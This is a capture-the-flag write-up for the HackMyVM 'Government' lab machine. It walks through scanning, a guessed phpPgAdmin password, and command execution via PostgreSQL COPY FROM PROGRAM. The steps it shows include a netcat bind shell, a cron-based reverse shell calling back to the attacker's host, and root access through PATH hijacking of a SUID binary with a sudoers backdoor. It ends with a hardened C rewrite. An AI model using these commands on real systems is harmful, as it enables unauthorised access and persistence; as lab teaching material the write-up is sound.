HackMyVM - Government - Writeup

https://hackmyvm.eu/machines/machine.php?vm=Government

A big thank you to OxJin for creating this well-written machine; there are hints along the journey, but there are also quite a lot of distractions to ignore.

Government is a medium-difficulty machine. Write-ups do not capture the frustration of not knowing exactly what the next step is, and there is quite a lot of extra content (ports, directories, files etc.) to distract you from the real path. I have only included the required steps and have obfuscated passwords.

Find it

┌──(kali㉿kali)-[~/government]

└─$ sudo netdiscover -r 10.0.0.0/24 -P

[sudo] password for kali: 

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 10.0.0.1        08:00:27:1f:ab:fd      1      60  PCS Systemtechnik GmbH

 10.0.0.40       08:00:27:23:75:82      1      60  PCS Systemtechnik GmbH


-- Active scan completed, 2 Hosts found.

  

Scan it

┌──(kali㉿kali)-[~/government]

└─$ nmap -T4 -sC -sV -oN nmap.out 10.0.0.40

Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 09:24 EST

Nmap scan report for 10.0.0.40

Host is up (0.00090s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE     VERSION

21/tcp   open  ftp         vsftpd 3.0.3

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| drwxr-xr-x    2 0        0            4096 Sep 01 15:59 files

| drwxr-xr-x    2 0        0            4096 Aug 31 12:33 government

|_drwxr-xr-x    2 0        0            4096 Nov 14 16:20 news

| ftp-syst: 

|   STAT: 

| FTP server status:

|      Connected to ::ffff:10.0.0.10

|      Logged in as ftp

|      TYPE: ASCII

|      No session bandwidth limit

|      Session timeout in seconds is 300

|      Control connection is plain text

|      Data connections will be plain text

|      At session startup, client count was 2

|      vsFTPd 3.0.3 - secure, fast, stable

|_End of status

22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)

| ssh-hostkey: 

|   2048 0b:95:9a:37:ae:d8:b0:c0:23:78:eb:04:c2:9b:6c:41 (RSA)

|   256 d4:a1:3b:a7:cc:e2:ea:ee:2e:6b:91:36:f9:be:da:6f (ECDSA)

|_  256 22:9f:42:60:3d:56:20:15:3a:ff:7c:19:0d:20:ca:7a (ED25519)

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

| http-robots.txt: 2 disallowed entries 

|_/login.php /admin

|_http-server-header: Apache/2.4.25 (Debian)

|_http-title: Site doesn't have a title (text/html).

111/tcp  open  rpcbind     2-4 (RPC #100000)

| rpcinfo: 

|   program version    port/proto  service

|   100000  2,3,4        111/tcp   rpcbind

|   100000  2,3,4        111/udp   rpcbind

|   100000  3,4          111/tcp6  rpcbind

|   100000  3,4          111/udp6  rpcbind

|   100003  3,4         2049/tcp   nfs

|   100003  3,4         2049/tcp6  nfs

|   100003  3,4         2049/udp   nfs

|   100003  3,4         2049/udp6  nfs

|   100005  1,2,3      42561/tcp6  mountd

|   100005  1,2,3      43735/udp   mountd

|   100005  1,2,3      53635/udp6  mountd

|   100005  1,2,3      56847/tcp   mountd

|   100021  1,3,4      34341/tcp   nlockmgr

|   100021  1,3,4      38727/tcp6  nlockmgr

|   100021  1,3,4      44586/udp   nlockmgr

|   100021  1,3,4      60655/udp6  nlockmgr

|   100227  3           2049/tcp   nfs_acl

|   100227  3           2049/tcp6  nfs_acl

|   100227  3           2049/udp   nfs_acl

|_  100227  3           2049/udp6  nfs_acl

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

2049/tcp open  nfs_acl     3 (RPC #100227)

Service Info: Host: GOVERNMENT; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Host script results:

|_clock-skew: mean: -19m59s, deviation: 34m37s, median: 0s

|_nbstat: NetBIOS name: GOVERNMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| smb-os-discovery: 

|   OS: Windows 6.1 (Samba 4.5.16-Debian)

|   Computer name: government

|   NetBIOS computer name: GOVERNMENT\x00

|   Domain name: \x00

|   FQDN: government

|_  System time: 2021-11-15T15:25:12+01:00

| smb-security-mode: 

|   account_used: guest

|   authentication_level: user

|   challenge_response: supported

|_  message_signing: disabled (dangerous, but default)

| smb2-security-mode: 

|   2.02: 

|_    Message signing enabled but not required

| smb2-time: 

|   date: 2021-11-15T14:25:12

|_  start_date: N/A


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 14.68 seconds

   


Quite a few ports are open, but it is always worth seeing whether nikto identifies anything on HTTP.

┌──(kali㉿kali)-[~/government]
└─$ nikto -h http://10.0.0.40
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.40
+ Target Hostname:    10.0.0.40
+ Target Port:        80
+ Start Time:         2021-11-15 09:48:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ 7891 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-11-15 09:49:02 (GMT-5) (58 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Website - no significant content other than to imply there is a database in the backend.
Anonymous FTP - files with old passwords and usernames, and a note about changing the encryption.
robots.txt - also has some entries, as noted in the nmap scan.

Looking at /phppgadmin, identified by nikto, I started looking at the field names in order to set up password guessing with hydra, but happened to guess the password manually on the second try whilst I was looking at it.
The default username is postgres, and after capturing a few login requests to set up a hydra dictionary attack I tried the password as admin and it worked, a happy accident!

From phpPgAdmin, SQL statements can be executed through the web interface, and PostgreSQL's COPY ... FROM PROGRAM (available since 9.3, and only for a superuser role, which the default postgres role is) runs an operating-system command as the postgres OS user. Here it starts a netcat bind shell on port 2346; COPY waits for the program to finish, so the browser request hangs while the shell is in use, which is expected.


DROP TABLE IF EXISTS hackmyvm;          -- [Optional] Drop the table you want to use if it already exists
CREATE TABLE hackmyvm(cmd_output text); -- Create the table you want to hold the command output
COPY hackmyvm FROM PROGRAM 'nc -nvlp 2346 -e /bin/bash';        -- Run the system command via the COPY FROM PROGRAM function

┌──(kali㉿kali)-[~/government]

└─$ nc 10.0.0.40 2346

python3 -c 'import pty; pty.spawn("/bin/bash")'

postgres@government:~$ 


As I was working on the server for a long time I set up a crontab to reconnect if I closed the terminal (as postgres can take a long time to recover and time out). The crontab entry runs the script through /bin/bash, so it does not depend on the execute bit being set on /dev/shm/test.sh (echo creates it without one).

postgres@government:/dev/shm$ echo "#!/bin/bash">/dev/shm/test.sh

postgres@government:/dev/shm$ echo "nc -e /bin/sh 10.0.0.10 4444">>/dev/shm/test.sh

postgres@government:/dev/shm$ echo "* * * * * /bin/bash /dev/shm/test.sh"|crontab -

Escalate to User

With a shell it is apparent that the only accounts of interest are 'erik' and 'root'. There didn't appear to be any exploitable binaries or services, so a search for credentials appeared to be required.
There is a hidden file in /var/log that can be found (I used linpeas.sh to scan and it found it for me).
(extract from linpeas.sh output)

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)

-rw-r--r-- 1 root root 432 Sep  1 16:55 /var/log/.creds.log

-rw------- 1 root root 0 Nov 15 15:22 /var/lib/nfs/.xtab.lock

-rw------- 1 root root 0 Nov 15 15:22 /var/lib/nfs/.etab.lock

-rw-r--r-- 1 root root 0 Nov 17 10:59 /run/network/.ifstate.lock

-rw------- 1 postgres postgres 69 Nov 17 12:55 /run/postgresql/.s.PGSQL.5432.lock

-rw-r--r-- 1 root root 220 May 15  2017 /etc/skel/.bash_logout

-rw------- 1 root root 0 Aug 30 19:48 /etc/.pwd.lock


postgres@government:/var/log$ cat .creds.log 

##WARNING##


//This file contain sensitive informations!!



/////////////////////////////////////////////////////////////

244fff13bf3c5f471e0e6bf7900945936cf1354dfea15130

////////////////////////////////////////////////////////////

key: Tr770f1NdMy1mP0sSibl3P4sSw0rD,7iK3****

////////////////////////////////////////////////////////////

IV: 5721370743022037

////////////////////////////////////////////////////////////



#WARNING#

postgres@government:/var/log$ 


After spending far too much time trying to work out what Python script had created it, I couldn't, and it would have helped if I had remembered the hint from the FTP files about the encryption being changed.
The lengths are the practical clue: the ciphertext is 48 hex characters (24 bytes) and the IV is 16 characters, which narrows the cipher and mode combinations worth trying.

There is a decrypt tool on CyberChef.




Escalate to Root


erik@government:~$ find . -perm -4000 -exec ls -al {} \; 2>/dev/null

-rwsr-sr-x 1 root root 8800 Aug 31 18:28 ./backups/nuclear/remove

erik@government:~$ cd backups/nuclear/

erik@government:~/backups/nuclear$ ls

file.txt  git.txt  nuc.txt  remove

erik@government:~/backups/nuclear$ 

There is an executable called remove with SUID set (it executes as the file owner, root); let's see what it does...

erik@government:~/backups/nuclear$ ./remove 

Error: Please enter a program to time!

erik@government:~/backups/nuclear$ ./remove nano

sh: 1: time: not found

 

Note: the source code for this is on the server at /usr/share/doc/libssl-doc/demos/bio/remove.c:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
     char command[256];            /* fixed-size buffer, never bounds-checked */

     if(argc != 2) {
          printf("Error: Please enter a program to time!\n");
          return -1;
     }

     memset(&command, 0, sizeof(command));

     strcat(command, "time ./");   /* "time" is resolved through the caller's PATH by /bin/sh */
     strcat(command, argv[1]);     /* attacker-controlled, unescaped and unbounded */

     system(command);              /* runs as root: SUID bit, PATH not reset, privileges not dropped */
     return 0;
}
The program takes one argument and is supposed to time how long it takes to execute, but it builds the string "time ./<argument>" and hands it to system(), i.e. to /bin/sh (dash on Debian) with the caller's environment intact. dash has no built-in time keyword (bash does) and /usr/bin/time is not installed, hence the "time: not found" above, so the shell searches PATH for it. Because the SUID binary never resets PATH, prepending a directory we control makes it run whatever "time" we put there as root; and since dash does not drop an elevated euid the way bash does, the script keeps euid=0. (argv[1] is also spliced into the shell command line unescaped and without a length check, so command injection or an overflow of the 256-byte buffer are other possible routes.) There are multiple methods; this is the one I picked:
1. Add the current directory to the front of PATH so the shell finds my "time" script first.
2. Write a simple script I want to run as root and give it execute rights.
3. Run ./remove with any argument; the argument only has to be present, as it is the custom "time" script that does the work.


erik@government:~/backups/nuclear$ echo $PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

erik@government:~/backups/nuclear$ export PATH=./:$PATH

erik@government:~/backups/nuclear$ echo $PATH

./:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

erik@government:~/backups/nuclear$ nano time 

erik@government:~/backups/nuclear$ cat time 

echo "erik ALL=(ALL) NOPASSWD: ALL" >/etc/sudoers.d/erik

id


erik@government:~/backups/nuclear$ chmod 777 time

erik@government:~/backups/nuclear$ ./remove something

uid=1000(erik) gid=1000(erik) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth),1000(erik)

erik@government:~/backups/nuclear$ sudo -l

Matching Defaults entries for erik on government:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin


User erik may run the following commands on government:

    (ALL) NOPASSWD: ALL

erik@government:~/backups/nuclear$ sudo su

root@government:/home/erik/backups/nuclear# 
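As an added example (not code from the Government VM or its author), here is the original's command construction next to a hardened runner that closes the three holes used above: no shell, a fixed PATH instead of the caller's, and the SUID privilege dropped before the timed program starts. The function names build_shell_command, is_safe_program_name and run_timed_safely are the example's own, and it assumes /usr/bin/time is GNU time.

```c
/* Added example, not from the Government VM: the vulnerable "time ./<arg>"
 * pattern from remove.c beside a hardened equivalent. All names here are
 * the example's own; /usr/bin/time is assumed to be the GNU time binary. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define CMD_CAP 256   /* same buffer size as the original remove.c */

/* The original's construction, made bounds-aware so it can be called safely.
 * It still yields a string meant for system(), so it keeps the two logical
 * flaws: /bin/sh resolves "time" through the caller's PATH, and arg is
 * interpreted by the shell (e.g. "x; sh" runs sh). Returns the length
 * written, or -1 where the original's strcat would have overflowed. */
int build_shell_command(char *out, size_t cap, const char *arg)
{
    int n = snprintf(out, cap, "time ./%s", arg);
    if (n < 0 || (size_t)n >= cap)
        return -1;   /* the original silently overflows command[] here */
    return n;
}

/* Hardened input policy: a bare file name from a tight allow-list, not
 * starting with '-' (would become an option to time) or '.', and short. */
int is_safe_program_name(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > 64)
        return 0;
    if (name[0] == '-' || name[0] == '.')
        return 0;
    for (size_t i = 0; i < len; i++) {
        char c = name[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-' || c == '.';
        if (!ok)
            return 0;
    }
    return 1;
}

/* Hardened runner: no shell, absolute path to time(1), a fixed environment
 * instead of the caller's, and root privileges given away in the child.
 * Returns the child's exit status, or -1 on validation or fork failure. */
int run_timed_safely(const char *name)
{
    if (!is_safe_program_name(name)) {
        errno = EINVAL;
        return -1;
    }
    char target[CMD_CAP];
    snprintf(target, sizeof target, "./%s", name);   /* fits: name <= 64 chars */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Timing a program does not need root: drop the SUID/SGID identity. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        char *child_argv[] = { "time", target, NULL };
        char *child_envp[] = { "PATH=/usr/bin:/bin", NULL };  /* caller's PATH ignored */
        execve("/usr/bin/time", child_argv, child_envp);
        _exit(127);   /* only reached if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <program-in-cwd>\n", argv[0]);
        return 2;
    }
    char cmd[CMD_CAP];
    if (build_shell_command(cmd, sizeof cmd, argv[1]) < 0)
        printf("original would overflow its %d-byte buffer\n", CMD_CAP);
    else
        printf("original would hand this to /bin/sh -c: %s\n", cmd);

    int rc = run_timed_safely(argv[1]);
    if (rc < 0)
        perror("run_timed_safely");
    return rc < 0 ? 1 : rc;
}
```

Compiled and run as ./safe_remove nano, the hardened path execs /usr/bin/time directly with a clean environment, so a "time" script placed earlier in the caller's PATH is never consulted, and the timed program runs as the invoking user rather than root.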





